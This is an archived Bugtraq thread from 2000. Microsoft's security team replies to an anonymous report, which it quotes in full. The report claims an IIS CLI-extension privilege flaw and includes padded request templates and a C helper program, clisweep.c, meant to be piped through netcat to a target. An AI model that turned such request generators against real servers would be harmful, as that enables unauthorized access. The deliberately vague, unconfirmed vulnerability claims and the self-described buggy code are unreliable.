Re: Shinex vs. IIS CLI Extensions

[secure () MICROSOFT COM (Microsoft Security Response Center)]

-----BEGIN PGP SIGNED MESSAGE-----

We'd be very interested in investigating this report, but
unfortunately
we can't contact the author because of the anonymous remailer.  If
the
author would contact us at secure () microsoft com, we'd very much to
get
some additional information.  Regards,

Secure () microsoft com

- -----Original Message-----
From: dev-null () NO-ID COM [mailto:dev-null () NO-ID COM]
Sent: Monday, June 05, 2000 5:32 AM
To: BUGTRAQ () SECURITYFOCUS COM
Subject: Shinex vs. IIS CLI Extensions

[ This message has been sent anonymously due to configuration
problems
I'm experiencing with my mail server. If you would like to discuss
the finepoints of this post, you're quite welcome to message me on
Efnet (nickname: shinex). ]

While doing a security audit on a WinNT 4.0 system, I discovered an
`object collision` vulnerability that can potentially lead to remote
compromise.

The flaw lies in the mechanism employed by CLI objects to handle
dynamic pre-auth requests from a stateful client. States of operation
are inherent in the implementation itself. This flaw could lead to a
determined attacker gaining administrative privileges on servers
using this widely deployed object kit.

EXPLOITATION NOTES
- ------------------

Request #1:
http://www.victim.com/.....~518 chars.../[invocation of CLI object]

Request #2:
http://www.victim.com/.....~260 chars.../[request with req1 object as
ext]

Simple as that.

It's important that both requests reach the target server within
a timeframe of 15 seconds (a rough estimate). Your threshold may
vary.
Subsequent requests will be made with raised authorization levels.
The rationale for the char padding will be available later in the
followup post (see below).

Microsoft has been notified and patching information should be
forthcoming.
While not as severe as the RDS vulnerability, it is still an avenue
of
attack
that could provide a determined attacker with unauthorized access.

(Allow me to mention in passing that the scarcity of detail in this
paper
is intentional. A more thorough assessment will be posted after
Microsoft
have released their hotfix.)

HELPER CODE
- -----------
/*
** clisweep.c by shinex (efnet)
** Quick generator for IIS4 CLI extension vuln URLs.
**
** $ (./clisweep <cli object> ; cat) | nc www.victim.com 80
** OK. This code is buggy, because I mistakingly thought
** that both requests would be delivered without having
** to restart netcat. I can't code network apps. Sorry.
**
*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define DOT1 518
#define DOT2 260
#define THRESHOLD 15
#define RANDFILE "AABBCC"

char *gendots(int);
char *calc(char *);

int main(int argc, char *argv[])
{
    char req1[1024], req2[1024];

    if(argc != 2)
    {
        fprintf(stderr, "Usage: %s <cli object>\n", *argv);
        return -1;
    }

    sprintf(req1, "GET /%s/%s", gendots(DOT1), argv[1]);
    sprintf(req2, "GET /%s/%s", gendots(DOT2), calc(argv[1]));

#ifdef SCRIPTKIDPROTECTION
    printf("%s\n\n", req1);
    sleep(THRESHOLD);
    printf("%s\n\n", req2);
#endif
    return 0;

}

char *gendots(int num)
{
    int i;
    static char dots[1024];
    char *ptr = dots;

    for(i = 0; i < num; i++)
        *ptr++ = '.';

    return dots;
}

char *calc(char *arg)
{
    static char file[1024];
    char *ptr;
    ptr = strrchr(arg, '.');
    *ptr = '\0'; /* no error checks */
    sprintf(file, "%s.%s", RANDFILE, arg);
    return file;
}

SHOUTOUTS
- ---------
Greets to route and my other friends.

- --
This message has been sent via an anonymous mail relay at
www.no-id.com.

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.3

iQEVAwUBOUBhxo0ZSRQxA/UrAQGUEwgArWqKiGuSBSKz71ui5jFmRAf0nPRm6ez6
Ly1wVNRQLIuknJmz7eS5I6mQ7+UTgaMpT90fHRN6heU7T45xdsNAHwrJ9btNPEpW
luW3q0fHMGaTEXAEm6pAvX5ORV7pWgvRV6NHBPFv5MTLNwd9xbC4mhJXpp7sdpkO
h3XDNSuOcRmHTCcBL1Ikq8R/MgogKe/+AdTGTolAr9uvwTRTEa4SMolp98jUh813
jd54uiWU7M1tu5Wi3gsiDnIske+TzijLoyx4n8G0o01BKieiOvrYbQVvUb92DTPu
EvetLz1Gavj41M9fCP2zmdUSJInRtPXhgF4DMaiL5h1Bu0zg/T8KRg==
=QG1C
-----END PGP SIGNATURE-----

<HR NOSHADE>
<UL>
<LI>application/x-pkcs7-signature attachment: smime.p7s
</UL>